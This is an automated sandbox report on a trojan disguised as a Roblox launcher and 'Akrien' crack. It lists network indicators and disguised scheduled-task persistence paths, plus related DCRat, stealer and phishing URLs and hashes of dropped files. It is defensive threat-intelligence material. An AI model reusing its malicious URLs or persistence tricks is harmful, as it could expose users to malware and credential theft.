            https://curl.se/docs/http-cookies.htmlRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeMs2%lRobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtLRobloxPlayerLauncher.exe, 00000001.00000003.1987825890.000000000424D000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004254000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.roblox.comURLInfoAboutFailedRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeTelemetryV2UrlFFlagRolloutDuplicateRobloxTelemetryCountersEnabledRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtWRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://curl.se/docs/alt-svc.htmlRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeMs2?RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtZRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txtRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerrRobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004210000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt6RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://127.0.0.1RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://uploads.backtrace.rbx.com/postTRobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagwRobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/v1.1/Counters/BatchIncrement?apiKey=76E5A40C-3AE1-4028-9F10RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://bit.ly/1eMQ42URFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            http://www.winimage.com/zLibDllRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://ephemeralcounters.api.roblox.com/v1.0/SequenceStatistics/BatchAddToSequencesV2?apiKey=76E5A4RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.0000000004276000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://www.winimage.com/zLibDll-1.2.11rbrRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ecsv2.roblox.com/client/pbeRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/(RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://akrien.wtf/&AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            23.201.248.158
            unknownUnited States
            16625AKAMAI-ASUSfalse
            104.21.68.54
            unknownUnited States
            13335CLOUDFLARENETUSfalse
            128.116.119.3
            unknownUnited States
            22697ROBLOX-PRODUCTIONUSfalse
            141.8.194.203
            unknownRussian Federation
            35278SPRINTHOSTRUfalse
            13.224.189.122
            unknownUnited States
            16509AMAZON-02USfalse
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1449910
            Start date and time:2024-05-31 02:56:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 13m 21s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:43
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:RFAwChXSve.exe
            renamed because original name is a hash value
            Original Sample Name:47CA55CDB30DB720D739BFB73504B928.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@52/58@0/5
            EGA Information:
            • Successful, ratio: 62.5%
            HCA Information:Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
            • Execution Graph export aborted for target RDMwYUvZPK.exe, PID 1068 because it is empty
            • Execution Graph export aborted for target RDMwYUvZPK.exe, PID 5904 because it is empty
            • Execution Graph export aborted for target refdhcp.exe, PID 7660 because it is empty
            • Not all processes where analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Skipping network analysis since amount of network traffic is too extensive
            TimeTypeDescription
            01:57:21Task SchedulerRun new task: RDMwYUvZPK path: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            01:57:21Task SchedulerRun new task: RDMwYUvZPKR path: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            01:57:22Task SchedulerRun new task: services path: "C:\Browserfont\services.exe"
            01:57:22Task SchedulerRun new task: servicess path: "C:\Browserfont\services.exe"
            01:57:22Task SchedulerRun new task: SgrmBroker path: "C:\AkrienAntiLeak\SgrmBroker.exe"
            01:57:22Task SchedulerRun new task: SgrmBrokerS path: "C:\AkrienAntiLeak\SgrmBroker.exe"
            01:57:25Task SchedulerRun new task: cmd path: "C:\Users\Public\Videos\cmd.exe"
            01:57:25Task SchedulerRun new task: cmdc path: "C:\Users\Public\Videos\cmd.exe"
            01:57:26Task SchedulerRun new task: Registry path: "C:\Browserfont\Registry.exe"
            01:57:26Task SchedulerRun new task: RegistryR path: "C:\Browserfont\Registry.exe"
            01:57:26Task SchedulerRun new task: RuntimeBroker path: "C:\Windows\en-US\RuntimeBroker.exe"
            01:57:26Task SchedulerRun new task: RuntimeBrokerR path: "C:\Windows\en-US\RuntimeBroker.exe"
            20:57:32API Interceptor6072308x Sleep call for process: RDMwYUvZPK.exe modified
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            141.8.194.203file.exeGet hashmaliciousPSWmarketBrowse
            • a0822772.xsph.ru/DLL//x64/SQLite.Interop.dll
            gDClW9sXsf.exeGet hashmaliciousDCRatBrowse
            • a0768742.xsph.ru/file2.bat
            13.224.189.122http://links.members.thrivent.com/ctt?m=22619476&r=NTYxNzAwMzczODg2S0&b=0&j=MjYyMTAzNzM2OAS2&k=Link31&kx=1&kt=1&kd=https://makeyourwheel.com%2fwp-content%2fupgrade%2fptilegx8%2fa2V2aW4ubGVlQHNhZGEuY29tGet hashmaliciousUnknownBrowse
            • links.members.thrivent.com/ctt?m=22619476&r=NTYxNzAwMzczODg2S0&b=0&j=MjYyMTAzNzM2OAS2&k=Link31&kx=1&kt=1&kd=https://makeyourwheel.com%2fwp-content%2fupgrade%2fptilegx8%2fa2V2aW4ubGVlQHNhZGEuY29t
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUShttps://5145542.fs1.hubspotusercontent-na1.net/hubfs/5145542/Knowledge%20Base/LD%20Software%20Downloads/5.9.1/LoupedeckInstaller_5.9.1.19364.exeGet hashmaliciousUnknownBrowse
            • 104.18.41.124
            https://5145542.fs1.hubspotusercontent-na1.net/hubfs/5145542/Knowledge%20Base/LD%20Software%20Downloads/5.9.1/LoupedeckInstaller_5.9.1.19364.exeGet hashmaliciousUnknownBrowse
            • 104.18.41.124
            https://track.cornzself.com/bad38662-656e-4aa6-ae91-6bf2d0472a97?%7Bvar1%7D=txt1&%7Bvar2%7D=mz&%7Bvar3%7D=19189907751Get hashmaliciousUnknownBrowse
            • 104.21.10.60
            http://trumpmaga.vip/NbqUuGet hashmaliciousUnknownBrowse
            • 104.19.229.21
            FW_ Matt Fisher shared the folder _Salishan DD Upload Folder_ with you.msgGet hashmaliciousHTMLPhisherBrowse
            • 104.18.11.207
            http://sekij22.pages.dev/Get hashmaliciousUnknownBrowse
            • 172.66.44.124
            http://loginmetamskus.gitbook.io/Get hashmaliciousUnknownBrowse
            • 172.64.147.209
            http://i6yg2.shop/Get hashmaliciousUnknownBrowse
            • 104.17.25.14
            http://wallet-metamask.org/Get hashmaliciousUnknownBrowse
            • 104.21.82.251
            http://1009.liqing-71.workers.dev/Get hashmaliciousUnknownBrowse
            • 188.114.97.3
            ROBLOX-PRODUCTIONUSoQDQSpA55K.exeGet hashmaliciousDCRatBrowse
            • 128.116.116.3
            oQDQSpA55K.exeGet hashmaliciousDCRatBrowse
            • 128.116.116.3
            tFGPgPkxgo.exeGet hashmaliciousLummaC, Glupteba, LummaC Stealer, SmokeLoader, Socks5Systemz, StealcBrowse
            • 128.116.102.4
            https://www.roblox.com.zm/loginGet hashmaliciousUnknownBrowse
            • 128.116.95.3
            https://www.roblox-games.pl/Get hashmaliciousUnknownBrowse
            • 128.116.95.4
            RobloxPlayerLauncher.exeGet hashmaliciousAgent Tesla, AgentTeslaBrowse
            • 128.116.102.8
            robloxlauncher.exeGet hashmaliciousUnknownBrowse
            • 128.116.127.4
            robloxlauncher.exeGet hashmaliciousUnknownBrowse
            • 128.116.127.4
            robloxlauncher.exeGet hashmaliciousUnknownBrowse
            • 128.116.127.4
            RobloxPlayerLauncher_(4).exeGet hashmaliciousUnknownBrowse
            • 128.116.119.8
            AKAMAI-ASUShttps://download2.easeus.com/installer_rss_new.phpGet hashmaliciousUnknownBrowse
            • 184.28.90.27
            FW_ Matt Fisher shared the folder _Salishan DD Upload Folder_ with you.msgGet hashmaliciousHTMLPhisherBrowse
            • 2.19.104.72
            http://1009.liqing-71.workers.dev/Get hashmaliciousUnknownBrowse
            • 2.19.104.10
            https://www-visacom-sg.wgmspu93576.workers.dev/Get hashmaliciousUnknownBrowse
            • 2.19.104.10
            xS8bwPQjO2.elfGet hashmaliciousMiraiBrowse
            • 23.36.14.136
            EgucScJumS.elfGet hashmaliciousMiraiBrowse
            • 104.119.246.45
            DBGServer.exeGet hashmaliciousUnknownBrowse
            • 88.221.168.8
            https://www.jotform.com/assign/241498205962059/ZVp1QmtoY0ZuamtQcXNSRHMyajRhSk9WUjJybmZzeVFlL2hNbGNONzNOTW12WXZOTEYvUVFSelJkaU5sNjVQSVpmenBpUjRPQ29RbFZzNDYyY1I4R1I4MnhPVmtyRUJKeTFGbVdyMWpTelFvL1lHbjNkYy9GMVY1TG9hRHh3Wk0=Get hashmaliciousHTMLPhisherBrowse
            • 104.102.23.137
            Account_Verification.htmGet hashmaliciousUnknownBrowse
            • 104.119.110.121
            SPRINTHOSTRU8Zi7xnKKw7.exeGet hashmaliciousPython Stealer, DCRat, Discord Token Stealer, EmpyreanBrowse
            • 141.8.197.42
            As8AupjAXk.exeGet hashmaliciousDCRatBrowse
            • 141.8.197.42
            jbLwhEMdSh.exeGet hashmaliciousDCRatBrowse
            • 141.8.194.149
            4321111000396.exeGet hashmaliciousFormBook, GuLoaderBrowse
            • 141.8.192.82
            http://a0988288.xsph.ru/yoyo334/yoyo322/adobe-home/login.html?log=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveL&log2=rqoAriVXSmPBWWmnzTzoDPx9WMEhvrgTHNqBG240uXsBy1Ypfp1Q7daowVeNn39wpyG9l2X2Qjj0YxKPxFy7ohqnxmlOWRzgFveLGet hashmaliciousUnknownBrowse
            • 141.8.192.103
            xA4LQYIndy.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.151
            n5X46REA4D.exeGet hashmaliciousDCRatBrowse
            • 141.8.195.33
            jW41mvKuf5.exeGet hashmaliciousDCRatBrowse
            • 141.8.195.33
            UJddkCw6p1.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.26
            N0tepkRPzw.exeGet hashmaliciousDCRatBrowse
            • 141.8.192.26
            No context
            No context
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (948), with no line terminators
            Category:dropped
            Size (bytes):948
            Entropy (8bit):5.906835833909567
            Encrypted:false
            SSDEEP:24:Z3UwnvfLoJZlF5emM9oLR7cb1eY7/8M4dQHz7LGlH6qfOW:9UwowmRl7coY7/8M4dQTmlH6qfOW
            MD5:E445996018C72C9251420277F18A7065
            SHA1:63B08DFA6B871C405527607A3E332A547206439C
            SHA-256:DE3A1830CABE55F45098CD92B8665960260B9986B68D2364BE164453FDFBF5FF
            SHA-512:FF357BFA22BFB308D8B96446C081C7DF8EEF260812FE9542CC0B53EA73B0C0C1E645D38B8E92927826D8A17D2B35AE0709E094820E704DAFF2E562AFE399F57A
            Malicious:false
            Preview:fEkAZ8HBKpEHN3M4MTpHcMtp5rqTqtTl380A5zNqbvhU5VdvQiky97eSU5FsRxUaVcNPCL8WF9pqpZtkN4DIIem6dipAueYoaG8cHOtEkNt9Ryn5LefXuMS00Rvef7llkBQjaQc8L8h4vmpp4uyQ9B4NyIm0dPjmlIYPhEe5BgLwoXENmFjvJVljHCvSnme5Z5SnNZH0P3OdzIiaDZNYpxdQgzIfTMRZBPWtEa9M7tfPHIt9eUONZGQlcCGYRmgDmzbjvzVmaBb6ROIYFJA87DA59vRCUl5UMcmSrKOp8mxXpTTO3sSHmiFizfjAiTSzFGuzl0r55VAVPmQqbCIlSxsoWEcLkOHoT8SijenDBWMQhuSNO3ifLqgRYFchXfVrOVBRTsG6ZFk6kcGmvP6qpldmcAKdBFpfBfBMsB3gwlFGGkq690vIioBn2ZySin5TaE5Fa44tVZ4DgXg2UNeLUg7WdYUTMl8IqvqBplfF6CwIu8Ge368UJu93HilCklhubvXureMssZPSuymfRzZQno96ww3GAcfVeCr8lWxYtPlufrIT6FuuLRHwva84kGsP33xsGn45BBgXCPbEokK4ruJN45MKX3xngW0l4aMSLztJuttg93QA6yhJujxLauhHN31qZ0KNX1t2AAdLLqKenxrsyq0UnB1bSl512CGJsCnEEpItGmAujDdaLJ2s90kW9SkZElSIjBvkJmnJhGOABH1PHeptKYK2cQEwFtpeT1KhR3QjfsK2ljV2aVRj5j7L13I3h0EybuqJ6U7ONGNcNRQ25LWubGiu39qXuXBpoWa13L6GXCVzWf8jmQ7VeUWVL6Q6nke0Eix00Z9uPPWZusYXBGueapKU9Fp659cwifvxsHsNRNGO77kdi25gzAZYXc0vuCyPxk0P7kp3YhNNj6XCfMYDE56iFWaPQ7dOY0aWGVf7MBIS
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):9
            Entropy (8bit):3.169925001442312
            Encrypted:false
            SSDEEP:3:rdo4n:m4
            MD5:B3D28C84258890625B1A64E8A9F455F5
            SHA1:86DD75E099C0F6993608893BBE7A2066CA115182
            SHA-256:788A812CD7EE8672F909278D971DACB052FA51F176B54E1144810FD24FC80D48
            SHA-512:2D5C15B51BF1492B17F66E00DF2972A77F47CAA0E35280218CBB1416A53A763B65922B1E212AC0EEDC67F735630405E620BA72631D2F13A72412BB50A1DDA4BA
            Malicious:false
            Preview:2048..yes
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (787), with no line terminators
            Category:dropped
            Size (bytes):787
            Entropy (8bit):5.902893944879972
            Encrypted:false
            SSDEEP:24:6A/V21Wcwvh+dD/jy/MJ/xHL9FeCN9yyqi/f:6A/JcaEdK/o/xzeCTyHQf
            MD5:78A4137820087EF964FA5BF12EADDBDB
            SHA1:3236C4AFA1599262288E02B18FFA3694F4CF1252
            SHA-256:6C9EEC0066D98E1E36101666443A6A0A102A3F33662369E1CA0AABD1571D545D
            SHA-512:4B04DEE4147D43D4829237EEFE59745F541B7FCCB712EA9683EA08592F7856DB19D01A957D5D88699560DFCA7F9CE17AF45A5115D070B29054F96A313A97BFF2
            Malicious:false
